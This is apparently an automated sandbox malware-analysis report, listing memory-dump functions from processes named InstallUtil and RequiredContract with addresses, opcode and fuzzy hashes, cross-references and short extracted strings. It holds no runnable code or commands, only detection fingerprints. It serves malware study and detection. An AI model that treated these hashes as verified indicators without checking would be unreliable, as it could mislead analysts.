Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f82fd4cc2a27ebcc39c4fcce5f4a8970697234adb0453277c418d4a00a1675db
Instruction ID: 07d22eb72392ceae536f5ade1622b7710b8167fc7b774bded109093763efa042
Opcode Fuzzy Hash: f82fd4cc2a27ebcc39c4fcce5f4a8970697234adb0453277c418d4a00a1675db
Instruction Fuzzy Hash: 9DC1B074E01218CFDB54DFA5C984B9DBBB2BF89304F2081AAD409AB358DB359E85CF50

Function 066ACEF8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c2582a28bf3bbb1f868630a3200af3c0068c1d98af5af16908512c879dc396
Instruction ID: e53f40e119dad361ae5e113debc19d19b1c7adeba5959c230b6cc587d0b1376a
Opcode Fuzzy Hash: 51c2582a28bf3bbb1f868630a3200af3c0068c1d98af5af16908512c879dc396
Instruction Fuzzy Hash: ACC1B274E01218CFDB54DFA5C954B9DBBB2BF89304F1081AAD409AB368DB359E85CF50

Function 066ACAA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e77d8189bb151900214f1051ed28b83a6ef95425f748892722ea0ef25add581
Instruction ID: 90cf9520392f2040d752a087ddd71bf2547b9774d6a2bd6d66d2c176a79f285b
Opcode Fuzzy Hash: 5e77d8189bb151900214f1051ed28b83a6ef95425f748892722ea0ef25add581
Instruction Fuzzy Hash: 6FC1B074E01218CFDB54DFA5C984B9DBBB2BF89304F2081AAD409AB358DB359E85CF50

Function 066A04A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 116a0f8d7580d9e4a1bcb78ce5db0c5bbd1e6ef43b6dbb7d56db785f8d65b8ba
Instruction ID: 64162cc7823333f57ce2c0c77655ea566d475c1e24b90008392841c71bc68755
Opcode Fuzzy Hash: 116a0f8d7580d9e4a1bcb78ce5db0c5bbd1e6ef43b6dbb7d56db785f8d65b8ba
Instruction Fuzzy Hash: A0C1BF74E01218CFDB54DFA5D944B9DBBB2BF89304F1081AAD809AB358DB359E85CF50

Function 066AE4B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc96481a40afd472f68b36422f4ab4622f30363fb41d7699384f5deb2365538
Instruction ID: de24071c2b5367861446b45ce7ec20b84714e26220580f4c2b93a8dd517a6619
Opcode Fuzzy Hash: bdc96481a40afd472f68b36422f4ab4622f30363fb41d7699384f5deb2365538
Instruction Fuzzy Hash: 0BC1B174E01218CFDB54DFA5D994B9DBBB2BF88304F1081AAD409AB358DB359E85CF50

Function 066A0D60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a087b7f6c45ab9baa288acd8e523c75056a6a70bdb659d3b43f2bd7141483c0
Instruction ID: 9f6631be07679b0a4f36bcc82243285b5c0f71e9d41dc7931cb29871bf3973b4
Opcode Fuzzy Hash: 9a087b7f6c45ab9baa288acd8e523c75056a6a70bdb659d3b43f2bd7141483c0
Instruction Fuzzy Hash: 79C1B074E01218CFDB54DFA5D944B9DBBB2BF89304F1081AAD809AB359DB359E85CF10

Function 066AED60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76fe5b41fddfd976f2eba4e0338fea4cae87a6cb09a49b933381484a2243f449
Instruction ID: a2572dc22f8a5a8f638716f5da0e76fb9be2bea5b14b7eacc09b3003c74d4a16
Opcode Fuzzy Hash: 76fe5b41fddfd976f2eba4e0338fea4cae87a6cb09a49b933381484a2243f449
Instruction Fuzzy Hash: 5BC1A174E01218CFDB54DFA5D994B9DBBB2BF88304F1081AAD409AB358DB359E85CF50

Function 066AB940 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e59dc2d1f717b62baa463e0649dd8d5cc363ef714b5b78462a140b1c47afc958
Instruction ID: 60d4675196a9f17375decc046b2e868ac8812928829ac859effd811002d5b887
Opcode Fuzzy Hash: e59dc2d1f717b62baa463e0649dd8d5cc363ef714b5b78462a140b1c47afc958
Instruction Fuzzy Hash: A5C1B074E01218CFDB54DFA5C994B9DBBB2BF88304F1081AAD409AB369DB359E85CF50

Function 066AD350 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a3f1f419283f370ec2b3c2dd26de14daa77e4588587dbb3dc03f8dd1e0dcd4b
Instruction ID: 1cf9c438ec314569515fc9794e0d6740b2c206d4e2826f54c9df5f9fdc1b9c53
Opcode Fuzzy Hash: 6a3f1f419283f370ec2b3c2dd26de14daa77e4588587dbb3dc03f8dd1e0dcd4b
Instruction Fuzzy Hash: 28C1AF74E01218CFDB54DFA5C994B9DBBB2BF88304F1081AAD409AB368DB359E85CF50

Function 066AE908 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b3ec8a496f1110e1aeb8f620663feb71f0e2a074252dd36941aafb4627b6184
Instruction ID: 4e34fcc0d55a2c8366101075eac8c14b8eb6f817dc2acd0b6012c2df6b0ef9b1
Opcode Fuzzy Hash: 3b3ec8a496f1110e1aeb8f620663feb71f0e2a074252dd36941aafb4627b6184
Instruction Fuzzy Hash: F3C1AF74E01218CFDB54DFA5C984B9DBBB2BF89304F1081AAD419AB368DB359E85CF50

Function 066A0900 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e104546330184e7e54dba3e09b4a99005c81c9d6f4685be486a89f978d53a6
Instruction ID: ee734143659dabe207fbf94ceea1b3972a1fb350d120b2e020e00df213f366d9
Opcode Fuzzy Hash: 39e104546330184e7e54dba3e09b4a99005c81c9d6f4685be486a89f978d53a6
Instruction Fuzzy Hash: 86C1BF74E01218CFDB54DFA5D984B9DBBB2BF89304F1081AAD809AB359DB359E85CF10

Function 066AC1F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8392a76afbe3b2784a187161914998b202ed54a2cb90e1347a05caa7fb517136
Instruction ID: 7dfcbd5a4d1bc48dd9549dc17db5bab6a4e4d8b0a708d42cd27c7fda0fc1c2f1
Opcode Fuzzy Hash: 8392a76afbe3b2784a187161914998b202ed54a2cb90e1347a05caa7fb517136
Instruction Fuzzy Hash: 41C1A074E01218CFDB54DFA5C944B9DBBB2BF89304F2081AAD409AB358DB359E85CF50

Function 066AD7A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d922ad27ad5d88a2421d9d7b500d32e358f120cd7ae36caf9c69c8ec01085768
Instruction ID: 6665a69d7889be28e3830c8b389920aaba220a3b0f18e92b0a3b2fda1a38d7f8
Opcode Fuzzy Hash: d922ad27ad5d88a2421d9d7b500d32e358f120cd7ae36caf9c69c8ec01085768
Instruction Fuzzy Hash: DBC1B074E01218CFDB54DFA5C994B9DBBB2BF88304F1081AAD409AB368DB359E85CF50

Function 066AF1B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88fd71380ba14352d4d1f0d21a3aea2c24ba936116eb8757f1254865a3f3f59
Instruction ID: 4b2ec2fa61a5430e65a2af7659d66c9da61b40a6069951fa5bc589467c8f6a92
Opcode Fuzzy Hash: d88fd71380ba14352d4d1f0d21a3aea2c24ba936116eb8757f1254865a3f3f59
Instruction Fuzzy Hash: B6C1B074E01218CFDB54DFA5C984B9DBBB2BF89304F2081AAD409AB359DB359E85CF50

Function 066ABD98 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbab4dd202fb9da020ab14c958e42166bea2489c79c2b1ff5da95a22ad7742c9
Instruction ID: 044e83090df89d97a9945e8c5b1e3478560a0958c9e4a7f3599a402983630bd3
Opcode Fuzzy Hash: cbab4dd202fb9da020ab14c958e42166bea2489c79c2b1ff5da95a22ad7742c9
Instruction Fuzzy Hash: CBC1B174E01218CFDB54DFA5C984BADBBB2BF89304F1081AAD409AB355DB359E85CF50

Function 010AEB6B Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d060a3ba183abea79f7f377f4f747c012c0735315f88cd31fb456c20a4a8ae67
Instruction ID: d1d94113dc7fc1e13c6808c694eee9da4fe4cd9a152d6344b5ad53853d750c14
Opcode Fuzzy Hash: d060a3ba183abea79f7f377f4f747c012c0735315f88cd31fb456c20a4a8ae67
Instruction Fuzzy Hash: 2AA19C74A01228CFDB64DF64C984B9ABBB2BF49301F5085EAE44DAB254DB319E81CF51

Function 010AED4C Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb30a2fb16dc5ed46e140d6237fe50a6acd021755df7dcfcb4d18f4f3a7f5bda
Instruction ID: 02413f3b775d94f2b3613739670ec77738e4c2f3a49c9779d569c93015ab4528
Opcode Fuzzy Hash: fb30a2fb16dc5ed46e140d6237fe50a6acd021755df7dcfcb4d18f4f3a7f5bda
Instruction Fuzzy Hash: 48519074A01229DFCB64DF24D954BA9B7B2FF4A301F5085EAD40AA7354DB319E81CF50

Function 010A60A0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;kq, xrefs: 010A60D2
\;kq, xrefs: 010A60DE
\;kq, xrefs: 010A60B6
\;kq, xrefs: 010A60AC

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: \;kq$\;kq$\;kq$\;kq
API String ID: 0-2874455797
Opcode ID: 7f843c26ba9bcb285496eef040c738c201a43b86dfe536d116f6d4cc82a8b3e2
Instruction ID: 65fc3090b809413da8510e8e7715f27c35de1ce144326a8df814fc1c404a27a2
Opcode Fuzzy Hash: 7f843c26ba9bcb285496eef040c738c201a43b86dfe536d116f6d4cc82a8b3e2
Instruction Fuzzy Hash: 9401B131780114CFC7608EACC550D2B7BF6AF8966036E42AAE641CB3B5DA33DC818780

Analysis Process: RequiredContract.exePID: 7844, Parent PID: 7776COMMON

Executed Functions

Function 02FB2FE0 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b54fbd81cb94ae17f3475d1916af9f75f2bb74e26b4d447242d2cee7eafbdeb
Instruction ID: 906ae43ee7f1285462732301d30a66c8a0307ed3f1dd9d23ca6f9b49b925dd59
Opcode Fuzzy Hash: 1b54fbd81cb94ae17f3475d1916af9f75f2bb74e26b4d447242d2cee7eafbdeb
Instruction Fuzzy Hash: 0AA1F331F44149CFDB02DFA9C890AEEBBB5FF49384F1585AADA05AB201D734AD41CB91

Function 02FB43F4 Relevance: 7.5, Strings: 6, Instructions: 7COMMON

Download Yara Rule

Strings

$kq, xrefs: 02FB45FA
TJpq, xrefs: 02FB5B2A
*), xrefs: 02FB5A93
$kq, xrefs: 02FB4610
TJpq, xrefs: 02FB45CE
jjjjjj, xrefs: 02FB4558

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID: *)$TJpq$TJpq$jjjjjj$$kq$$kq
API String ID: 0-998880824
Opcode ID: f2481dbef01562eccf883da24f3dcbdf75b9fa485ae480a87904751164d2512c
Instruction ID: 82f4d9e8ad92d524322e68b054be87fe24d1094fb460007c925457e902c18098
Opcode Fuzzy Hash: f2481dbef01562eccf883da24f3dcbdf75b9fa485ae480a87904751164d2512c
Instruction Fuzzy Hash: 93B0925280E780DE87034EA9CAD01A07F24AEA228235DC4E6C8854E44BC0248686E332

Function 02FB1470 Relevance: 5.4, Strings: 4, Instructions: 369COMMON

Download Yara Rule

Strings

@, xrefs: 02FB16C3
Tekq, xrefs: 02FB1605
TJpq, xrefs: 02FB14A0
TJpq, xrefs: 02FB161C

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID: @$TJpq$TJpq$Tekq
API String ID: 0-9818392
Opcode ID: 9857060e24f185861f88e1125123f3aad76470acf48a64a6845517decb461432
Instruction ID: f54dad59cdbbd8a6a826712ecfb3211331ce399765ecfb939c002ca07524d893
Opcode Fuzzy Hash: 9857060e24f185861f88e1125123f3aad76470acf48a64a6845517decb461432
Instruction Fuzzy Hash: CEE18C35B04144CFDB068B69D4A4BAEBBF2FF4A350F2540A9E54ADB3A1CA34EC45CB51

Function 02FB3FF0 Relevance: 5.2, Strings: 4, Instructions: 208COMMON

Download Yara Rule

Strings

$kq, xrefs: 02FB426D
d%qq, xrefs: 02FB419D
d%qq, xrefs: 02FB410B
$kq, xrefs: 02FB4261

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID: d%qq$d%qq$$kq$$kq
API String ID: 0-2487373968
Opcode ID: 75aa64c13e33bf27bc77dfd4d6eee08b262089846c0478045f154513ef3edf61
Instruction ID: 6be8d631e293ec8b97fd7144b50911ca858bab47df044ce78831f0464dfac6cb
Opcode Fuzzy Hash: 75aa64c13e33bf27bc77dfd4d6eee08b262089846c0478045f154513ef3edf61
Instruction Fuzzy Hash: 39613630B042048FC716CA7A8E607BB76A7FF89780F20456AD516DB3E6CA35DC428792

Function 02FB5A3C Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

TJpq, xrefs: 02FB5B2A
*), xrefs: 02FB5A93

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID: *)$TJpq
API String ID: 0-3541879849
Opcode ID: 64cb4e0abb1174cc8379b74188d7e77861ff7164c5035cfb33d03a995586df9c
Instruction ID: 3e06c67e4c14928df05c752f070c0966e3f3973a8b352ae7d12bdce56d997569
Opcode Fuzzy Hash: 64cb4e0abb1174cc8379b74188d7e77861ff7164c5035cfb33d03a995586df9c
Instruction Fuzzy Hash: D15106707106418FDB168F79C894BAEBBF1EF49724F248599E5558B3E1C734AC42CB50

Function 02FB5A88 Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

TJpq, xrefs: 02FB5B2A
*), xrefs: 02FB5A93

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID: *)$TJpq
API String ID: 0-3541879849
Opcode ID: 4cf5866ca99f08a86ebd16717ef4c6e6c5e4dc3694e61c46a5a5797c7646210b
Instruction ID: 80ced85b5505d3581511eaebc17a704e4c4165515b462d88b5260f743434f6a7
Opcode Fuzzy Hash: 4cf5866ca99f08a86ebd16717ef4c6e6c5e4dc3694e61c46a5a5797c7646210b
Instruction Fuzzy Hash: F8518B74B106118FCB14DF6AC844A5EB7F2BF48B24F608699E516DB3F1CB34AC418B54

Function 02FB6A60 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

jq, xrefs: 02FB6A68

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID: jq
API String ID: 0-1545688603
Opcode ID: f261ff05f6f0d34df9b245ce42659f6fa664e137659c105f7637ce6ac26cf7a4
Instruction ID: 10f53f23ea67fd9db28e7f8befa93ef98844a12e27b9b4e90523bf442801b324
Opcode Fuzzy Hash: f261ff05f6f0d34df9b245ce42659f6fa664e137659c105f7637ce6ac26cf7a4
Instruction Fuzzy Hash: 20418974D042488FDB11CFAAC5946EEBBF9EF48340F24846AE945EB264DB349D45CB90

Function 02FB0C80 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

Tekq, xrefs: 02FB0D1C

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 4c72b7e3cbe9568a1f17338eec46f5d83d3e78f73269b609739d3d069ceb0c86
Instruction ID: f49f5572a6f1ac4e37a870e12e81a0afd2e9a987e3b76b00224c1ed07c5bd635
Opcode Fuzzy Hash: 4c72b7e3cbe9568a1f17338eec46f5d83d3e78f73269b609739d3d069ceb0c86
Instruction Fuzzy Hash: E4315E74B002159FDB15DFA9C558ADEBBF2AF88750F104069E502AB3A5DF759C02CB90

Function 02FB17A8 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

Tekq, xrefs: 02FB17A8

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 39bd14036a616189dae908eeb762f1e992a4d6aa5337e83091daa76ef87584d1
Instruction ID: 152f256a0247d3be5da1058fc8dbeec1cfa1ea3b2050c35fcab74a3e92cd7c41
Opcode Fuzzy Hash: 39bd14036a616189dae908eeb762f1e992a4d6aa5337e83091daa76ef87584d1
Instruction Fuzzy Hash: C1312975B00215DFDB15DF6AD468BAEB7B1BF48344F104069E606DB3A4CB75D901CB40

Function 02FB09D1 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

Tekq, xrefs: 02FB09F4

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 9e7d46d424c74d62f21bf4c793968fb1f7a2d08a112a0a3fe555cb1df3814b4a
Instruction ID: 174d12a57301179176228de821cadbbf05663d7e1efbc03bcea8cee34fddc393
Opcode Fuzzy Hash: 9e7d46d424c74d62f21bf4c793968fb1f7a2d08a112a0a3fe555cb1df3814b4a
Instruction Fuzzy Hash: 1A11AF71A001188FEB19DF69C9597EF7BF2AF88340F148029E902BB3A4DF345945CBA1

Function 02FB09E0 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

Tekq, xrefs: 02FB09F4

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: a58dda8e5e20f53ddd4e5ee7f91951edba5fd0aa0fc48eefc8af51fdc39515ea
Instruction ID: 1e6b05e099cf8402f53737b5e3a1e7797ada95e5c3a3f61787b34269fcfa5a76
Opcode Fuzzy Hash: a58dda8e5e20f53ddd4e5ee7f91951edba5fd0aa0fc48eefc8af51fdc39515ea
Instruction Fuzzy Hash: CE118B30A002188FEB15DF69C9587EF7BF2AF88700F108029E502BB3A4DF349941CBA5

Function 02FB2458 Relevance: .5, Instructions: 534COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ec8dcb898cc008c816bf771db06325a53d9e55dd29df551ac08c7d4c5f4bbc6
Instruction ID: 1ba6e3e619d5dc25f95d991538748a16eacea81a1c64026cfccf99841ad329e1
Opcode Fuzzy Hash: 2ec8dcb898cc008c816bf771db06325a53d9e55dd29df551ac08c7d4c5f4bbc6
Instruction Fuzzy Hash: BF4206B4905208CFD711DF5ADA88A98BBF2FB09344F55C1AAD9254F2A2D379DD84CF80

Function 02FB2449 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48962f934cf561706fd545a16342587d77d83d9f884ed348e1d88fef08f678fb
Instruction ID: ee54be67449187e281d1dd0ed5c3b16c42897312abf3250cd63e24e1ab0a1c7e
Opcode Fuzzy Hash: 48962f934cf561706fd545a16342587d77d83d9f884ed348e1d88fef08f678fb
Instruction Fuzzy Hash: 8A12E5B4905204CFD711DF5BDA48A94BBE1FB0A345F46C1AAD9254F2A2D37ADD88CF80

Function 02FB2626 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 147e8c5eeb0fc35755548ff7302d7d8823e64aa1b4d310a9daa10de0749c7a8f
Instruction ID: dd84db99f5fb4da07923aa9afaf9049e9b10f077feb6836088fddf3deaae3a11
Opcode Fuzzy Hash: 147e8c5eeb0fc35755548ff7302d7d8823e64aa1b4d310a9daa10de0749c7a8f
Instruction Fuzzy Hash: 38F1E6B4D05204CFD711DF5BDA48A94BBE2FB0A345F56C1AAC9254F2A2D37AD984CF40

Function 02FB2E50 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75aa8fbceeb4e214b92992bd17f4472959573f0261132a568c1bc3c493d796c3
Instruction ID: c479cb46c83f2908fb6a1692e55617620c429bc8c4c79a2a5a68a7e21679c19c
Opcode Fuzzy Hash: 75aa8fbceeb4e214b92992bd17f4472959573f0261132a568c1bc3c493d796c3
Instruction Fuzzy Hash: 8FA1A331F04149CFDB02DFAAC8907EEBBB1FF49380F1584A6DA45AB251D734A945CB61

Function 02FB6C55 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b42b1dd5372a2fb9bc9cd42975f19c44109ede5f4d7b436c10580204f9edb8f4
Instruction ID: 555e00e71f460970da0592006f41dacb766f3291826515d73e0f9d39a3e6c3b7
Opcode Fuzzy Hash: b42b1dd5372a2fb9bc9cd42975f19c44109ede5f4d7b436c10580204f9edb8f4
Instruction Fuzzy Hash: 71415AB1D012489FDB11CFAAC590AEEBFF5AF48340F24846AE549AB265CB349945CF90

Function 02FB6CCC Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2011776984.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2fb0000_RequiredContract.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71dacdd1f7402e1845589fe7579feb4fa309cf8da9ce420fdb92d6e9d201bfb7
Instruction ID: 273e0dc1496a2bbec22c69bbb8e21545b9efb6a816277fffc297bbd5ae4a8498
Opcode Fuzzy Hash: 71dacdd1f7402e1845589fe7579feb4fa309cf8da9ce420fdb92d6e9d201bfb7
